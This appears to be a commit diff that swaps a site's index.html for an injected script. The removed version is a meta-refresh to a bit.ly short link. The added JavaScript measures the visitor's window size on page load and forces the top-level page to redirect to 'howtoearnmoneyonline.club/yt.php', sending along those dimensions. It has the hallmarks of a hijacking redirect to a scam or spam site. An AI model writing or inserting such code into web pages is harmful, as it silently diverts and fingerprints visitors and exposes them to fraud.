--- a/index.html
+++ b/index.html
@@ -1,7 +1,13 @@
-<!DOCTYPE html>
-<html>
-   <head>
-      <meta http-equiv = "refresh" content = "0; url = http://bit.ly/2lXbysm" />
-   </head>
- 
-</html>
+<script type="text/javascript">
+x=window.innerWidth||0;
+y=window.innerHeight||0;
+if (typeof document.documentElement != 'undefined') {
+	x=document.documentElement.clientWidth;
+	y=document.documentElement.clientHeight;
+}
+if (document.body !== null) {
+	x=document.body.clientWidth;
+	y=document.body.clientHeight;
+}
+top.location.href=("https://howtoearnmoneyonline.club/yt.php?"+x+"&vh="+y).replace(/\/$/, "");
+</script>
